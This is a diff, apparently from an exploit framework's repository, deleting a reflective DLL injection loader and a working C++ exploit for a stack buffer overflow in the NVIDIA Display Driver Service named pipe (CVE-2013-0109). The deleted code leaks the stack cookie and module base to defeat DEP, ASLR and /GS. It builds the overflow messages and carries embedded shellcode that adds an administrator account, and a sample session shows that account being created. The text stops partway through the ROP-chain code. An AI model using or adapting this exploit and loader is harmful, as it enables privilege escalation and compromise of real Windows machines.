- - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. - uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; - while( uiValueE-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - - while( uiValueD-- ) - *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++; - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... - - // uiValueB = the address of the import directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume their is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all imports - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) - { - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( ULONG_PTR ); - if( uiValueD ) - uiValueD += sizeof( ULONG_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... - - // calculate the base address delta and perform relocations (even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... - while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! - if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; -#ifdef WIN_ARM - // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem. - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T ) - { - register DWORD dwInstruction; - register DWORD dwAddress; - register WORD wImm; - // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word) - dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ); - // flip the words to get the instruction as expected - dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - // sanity chack we are processing a MOV instruction... - if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT ) - { - // pull out the encoded 16bit value (the high portion of the address-to-relocate) - wImm = (WORD)( dwInstruction & 0x000000FF); - wImm |= (WORD)((dwInstruction & 0x00007000) >> 4); - wImm |= (WORD)((dwInstruction & 0x04000000) >> 15); - wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4); - // apply the relocation to the target address - dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF; - // now create a new instruction with the same opcode and register param. - dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 ); - // patch in the relocated address... - dwInstruction |= (DWORD)(dwAddress & 0x00FF); - dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4; - dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15; - dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4; - // now flip the instructions words and patch back into the code... - *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - } - } -#endif - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing. - pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 ); - - // call our respective entry point, fudging our hInstance value -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed. - return uiValueA; -} -//===============================================================================================// -#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - switch( dwReason ) - { - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} - -#endif -//===============================================================================================// diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h deleted file mode 100644 index 3797879e47..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h +++ /dev/null @@ -1,203 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H -#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include -#include -#include - -#include "ReflectiveDLLInjection.h" - -typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); -typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); -typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); -typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG ); - -#define KERNEL32DLL_HASH 0x6A4ABC5B -#define NTDLLDLL_HASH 0x3CFA685D - -#define LOADLIBRARYA_HASH 0xEC0E4E8E -#define GETPROCADDRESS_HASH 0x7C0DFCAA -#define VIRTUALALLOC_HASH 0x91AFCA54 -#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 - -#define IMAGE_REL_BASED_ARM_MOV32A 5 -#define IMAGE_REL_BASED_ARM_MOV32T 7 - -#define ARM_MOV_MASK (DWORD)(0xFBF08000) -#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) -#define ARM_MOVW 0xF2400000 -#define ARM_MOVT 0xF2C00000 - -#define HASH_KEY 13 -//===============================================================================================// -#pragma intrinsic( _rotr ) - -__forceinline DWORD ror( DWORD d ) -{ - return _rotr( d, HASH_KEY ); -} - -__forceinline DWORD hash( char * c ) -{ - register DWORD h = 0; - do - { - h = ror( h ); - h += *c; - } while( *++c ); - - return h; -} -//===============================================================================================// -typedef struct _UNICODE_STR -{ - USHORT Length; - USHORT MaximumLength; - PWSTR pBuffer; -} UNICODE_STR, *PUNICODE_STR; - -// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY -//__declspec( align(8) ) -typedef struct _LDR_DATA_TABLE_ENTRY -{ - //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STR FullDllName; - UNICODE_STR BaseDllName; - ULONG Flags; - SHORT LoadCount; - SHORT TlsIndex; - LIST_ENTRY HashTableEntry; - ULONG TimeDateStamp; -} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; - -// WinDbg> dt -v ntdll!_PEB_LDR_DATA -typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -{ - DWORD dwLength; - DWORD dwInitialized; - LPVOID lpSsHandle; - LIST_ENTRY InLoadOrderModuleList; - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - LPVOID lpEntryInProgress; -} PEB_LDR_DATA, * PPEB_LDR_DATA; - -// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK -typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes -{ - struct _PEB_FREE_BLOCK * pNext; - DWORD dwSize; -} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; - -// struct _PEB is defined in Winternl.h but it is incomplete -// WinDbg> dt -v ntdll!_PEB -typedef struct __PEB // 65 elements, 0x210 bytes -{ - BYTE bInheritedAddressSpace; - BYTE bReadImageFileExecOptions; - BYTE bBeingDebugged; - BYTE bSpareBool; - LPVOID lpMutant; - LPVOID lpImageBaseAddress; - PPEB_LDR_DATA pLdr; - LPVOID lpProcessParameters; - LPVOID lpSubSystemData; - LPVOID lpProcessHeap; - PRTL_CRITICAL_SECTION pFastPebLock; - LPVOID lpFastPebLockRoutine; - LPVOID lpFastPebUnlockRoutine; - DWORD dwEnvironmentUpdateCount; - LPVOID lpKernelCallbackTable; - DWORD dwSystemReserved; - DWORD dwAtlThunkSListPtr32; - PPEB_FREE_BLOCK pFreeList; - DWORD dwTlsExpansionCounter; - LPVOID lpTlsBitmap; - DWORD dwTlsBitmapBits[2]; - LPVOID lpReadOnlySharedMemoryBase; - LPVOID lpReadOnlySharedMemoryHeap; - LPVOID lpReadOnlyStaticServerData; - LPVOID lpAnsiCodePageData; - LPVOID lpOemCodePageData; - LPVOID lpUnicodeCaseTableData; - DWORD dwNumberOfProcessors; - DWORD dwNtGlobalFlag; - LARGE_INTEGER liCriticalSectionTimeout; - DWORD dwHeapSegmentReserve; - DWORD dwHeapSegmentCommit; - DWORD dwHeapDeCommitTotalFreeThreshold; - DWORD dwHeapDeCommitFreeBlockThreshold; - DWORD dwNumberOfHeaps; - DWORD dwMaximumNumberOfHeaps; - LPVOID lpProcessHeaps; - LPVOID lpGdiSharedHandleTable; - LPVOID lpProcessStarterHelper; - DWORD dwGdiDCAttributeList; - LPVOID lpLoaderLock; - DWORD dwOSMajorVersion; - DWORD dwOSMinorVersion; - WORD wOSBuildNumber; - WORD wOSCSDVersion; - DWORD dwOSPlatformId; - DWORD dwImageSubsystem; - DWORD dwImageSubsystemMajorVersion; - DWORD dwImageSubsystemMinorVersion; - DWORD dwImageProcessAffinityMask; - DWORD dwGdiHandleBuffer[34]; - LPVOID lpPostProcessInitRoutine; - LPVOID lpTlsExpansionBitmap; - DWORD dwTlsExpansionBitmapBits[32]; - DWORD dwSessionId; - ULARGE_INTEGER liAppCompatFlags; - ULARGE_INTEGER liAppCompatFlagsUser; - LPVOID lppShimData; - LPVOID lpAppCompatInfo; - UNICODE_STR usCSDVersion; - LPVOID lpActivationContextData; - LPVOID lpProcessAssemblyStorageMap; - LPVOID lpSystemDefaultActivationContextData; - LPVOID lpSystemAssemblyStorageMap; - DWORD dwMinimumStackCommit; -} _PEB, * _PPEB; - -typedef struct -{ - WORD offset:12; - WORD type:4; -} IMAGE_RELOC, *PIMAGE_RELOC; -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp b/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp deleted file mode 100644 index d97f113401..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp +++ /dev/null @@ -1,537 +0,0 @@ -/* - -NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012 -- Bypass DEP + ASLR + /GS + CoE -============================================================= -(@peterwintrsmith) - - ** Initial release 25/12/12 - ** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks - @seanderegge! - -Hey all! - -Here is an interesting exploit for a stack buffer overflow in the NVidia -Display Driver Service. The service listens on a named pipe (\pipe\nsvr) -which has a NULL DACL configured, which should mean that any logged on user -or remote user in a domain context (Windows firewall/file sharing -permitting) should be able to exploit this vulnerability. - -The buffer overflow occurs as a result of a bad memmove operation, with the -stack layout effectively looking like this: - -[locals] -[received-data] -[response-buf] -[stack cookie] -[return address] -[arg space] -[etc] - -The memmove copies data from the received-data buffer into the response-buf -buffer, unchecked. It is possible to control the offset from which the copy -starts in the received-data buffer by embedding a variable length string - -which forms part of the protocol message being crafted - as well as the -number of bytes copied into the response buffer. - -The amount of data sent back over the named pipe is related to the number -of bytes copied rather than the maximum number of bytes that the buffer is -able to safely contain, so it is possible to leak stack data by copying -from the end of the received-data buffer, through the response-buf buffer -(which is zeroed first time round, and second time round contains whatever -was in it beforehand), right to the end of the stack frame (including stack -cookie and return address). - -As the entire block of data copied is sent back, the stack cookie and -nvvsvc.exe base can be determined using the aforementioned process. The -stack is then trashed, but the function servicing pipe messages won't -return until the final message has been received, so it doesn't matter too -much. - -It is then possible to exploit the bug by sending two further packets of -data: One containing the leaked stack cookie and a ROP chain dynamically -generated using offsets from the leaked nvvsvc.exe base (which simply fills -the response-buf buffer when this data is echoed back) and a second packet -which contains enough data to trigger an overwrite if data is copied from -the start of the received-data buffer into the response-buf (including the -data we primed the latter to contain - stack cookie and ROP chain). - -Allowing the function to then return leads to execution of our ROP chain, -and our strategically placed Metasploit net user /add shellcode! We get -continuation of execution for free because the process spins up a thread -to handle each new connection, and there are no deadlocks etc. - -I've included two ROP chains, one which works against the nvvsvc.exe -running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers -from the Dell site, and one which works against the latest version of the -drivers for the same card, from: -http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m -http://www.geforce.co.uk/drivers/results/54709 - -Hope you find this interesting - it's a fun bug to play with! - -- Sample Session - - - -C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators -Alias name administrators -Comment Administrators have complete and unrestricted access to the computer/domain - -Members - -------------------------------------------------------------------------------- -Administrator -Peter -The command completed successfully. - - -C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1 - ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) ** - [@peterwintrsmith] - - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 - - - Action 1 of 9: - CONNECT - - Action 2 of 9: - CLIENT => SERVER - Written 16416 (0x4020) characters to pipe - - Action 3 of 9: - SERVER => CLIENT - Read 16504 (0x4078) characters from pipe - - Action 4 of 9: Building exploit ... - => Stack cookie 0xe2e2893340d4: - => nvvsvc.exe base 0x13fb90000: - - Action 5 of 9: - CLIENT => SERVER - Written 16416 (0x4020) characters to pipe - - Action 6 of 9: - SERVER => CLIENT - Read 16384 (0x4000) characters from pipe - - Action 7 of 9: - CLIENT => SERVER - Written 16416 (0x4020) characters to pipe - - Action 8 of 9: - SERVER => CLIENT - Read 16896 (0x4200) characters from pipe - - Action 9 of 9: - DISCONNECT - -C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators -Alias name administrators -Comment Administrators have complete and unrestricted access to the computer/domain - -Members - -------------------------------------------------------------------------------- -Administrator -Peter -r00t -The command completed successfully. - - -C:\Users\Peter\Desktop\NVDelMe1> - -*/ - -#include -#include -#define SCSIZE 2048 -char code[SCSIZE] = "PAYLOAD:"; - -enum EProtocolAction -{ - ProtocolAction_Connect = 0, - ProtocolAction_Receive, - ProtocolAction_Send, - ProtocolAction_Disconnect, - ProtocolAction_ReadCookie, -}; - -typedef struct { - EProtocolAction Action; - PBYTE Buf; - DWORD Length; -} ProtocolMessage; - -const int GENERIC_BUF_LENGTH = 0x10000; - -#define WriteByte(val) {buf[offs] = val; offs += 1;} -#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;} -#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;} -#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;} -#define BufRemaining() (sizeof(buf) - offs) - -DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer) -{ - DWORD dwWritten = 0; - - if(WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL)) - return dwWritten; - - return 0; -} - -DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE) -{ - DWORD dwRead = 0, dwAvailable = 0; - - if(bTimeout) - { - for(DWORD i=0; i < 30; i++) - { - if(!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL)) - goto Cleanup; - - if(dwAvailable) - break; - - Sleep(100); - } - - if(!dwAvailable) - goto Cleanup; - } - - if(!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL)) - goto Cleanup; - -Cleanup: - return dwRead; -} - -HANDLE EstablishPipeConnection(char *pszPipe) -{ - HANDLE hPipe = CreateFileA( - pszPipe, - GENERIC_READ | GENERIC_WRITE, - 0, - NULL, - OPEN_EXISTING, - 0, - NULL - ); - - if(hPipe == INVALID_HANDLE_VALUE) - { - return NULL; - } - - return hPipe; -} - -BYTE *BuildMalicious_LeakStack() -{ - static BYTE buf[0x4020] = {0}; - UINT offs = 0; - - WriteWord(0x52); - - for(UINT i=0; i<0x2000; i++) - WriteWord(0x41); - - WriteWord(0); - - WriteDword(0); - WriteDword(0x4078); - - WriteDword(0x41414141); - WriteDword(0x41414141); - WriteDword(0x41414141); - WriteDword(0x41414141); - WriteDword(0x41414141); - - return buf; -} - -BYTE *BuildMalicious_FillBuf() -{ - static BYTE buf[0x4020] = {0}; - UINT offs = 0; - - WriteWord(0x52); - WriteWord(0); // string - - WriteDword(0); - WriteDword(0x4000); - - while(BufRemaining()) - WriteDword(0x43434343); - - return buf; -} - -BYTE *BuildMalicious_OverwriteStack() -{ - static BYTE buf[0x4020] = {0}; - UINT offs = 0; - - WriteWord(0x52); - WriteWord(0); // string - - WriteDword(0); - WriteDword(0x4340); // enough to copy shellcode too - - while(BufRemaining()) - WriteDword(0x42424242); - - return buf; -} - -extern "C" int run() -{ - DWORD dwReturnCode = 1, dwBytesInOut = 0; - HANDLE hPipe = NULL; - - static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = {0}; - - memset(rgReadBuf, 0, sizeof(rgReadBuf)); - - ProtocolMessage rgConvoMsg[] = { - {ProtocolAction_Connect, NULL, 0}, - {ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020}, - {ProtocolAction_Receive, {0}, 0x4200}, - {ProtocolAction_ReadCookie, {0}, 0}, - {ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020}, - {ProtocolAction_Receive, {0}, 0x4000}, - {ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020}, - {ProtocolAction_Receive, {0}, 0x4200}, - {ProtocolAction_Disconnect, NULL, 0}, - }; - - DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0; - BOOL bTryAgain = FALSE; - char szPipe[256] = {0}; - - // We could renable remote hosts to target other devices on network?! - //if(stricmp(argv[1], "local") == 0) - strcpy(szPipe, "\\\\.\\pipe\\nvsr"); - //else - // sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]); - - while(i < dwNumberOfMessages) - { - printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages); - - switch(rgConvoMsg[i].Action) - { - case ProtocolAction_Connect: - printf(" - CONNECT\n"); - - hPipe = EstablishPipeConnection(szPipe); - if(!hPipe) - { - printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError()); - goto Cleanup; - } - - break; - case ProtocolAction_Disconnect: - printf(" - DISCONNECT\n"); - - CloseHandle(hPipe); - hPipe = NULL; - - break; - case ProtocolAction_Send: - printf(" - CLIENT => SERVER\n"); - - if(!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length))) - { - printf("!! Error writing to pipe\n"); - goto Cleanup; - } - - printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut); - - break; - case ProtocolAction_Receive: - printf("\t - SERVER => CLIENT\n"); - - if(!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE))) - { - printf("!! Error reading from pipe (at least, no data on pipe)\n"); - goto Cleanup; - } - - printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut); - - break; - case ProtocolAction_ReadCookie: - - // x64 Metasploit cmd/exec: - // "net user r00t r00t00r! /add & net localgroup administrators /add" - // exitfunc=thread - /*char code[] = "" - "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" - "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" - "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" - "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" - "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" - "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" - "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" - "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" - "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" - "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" - "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" - "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" - "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" - "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" - "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" - "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" - "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" - "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" - "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30" - "\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64" - "\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72" - "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74" - "\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/ - printf("Building exploit ...\n"); - unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034); - printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie); - - memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8); - - unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL; - - // Perform some limited fingerprinting (my default install version, vs latest at time of testing) - switch(uiRetnAddress & 0xfff) - { - case 0x640: // nvvsvc.exe - 03 Nov 2011 - 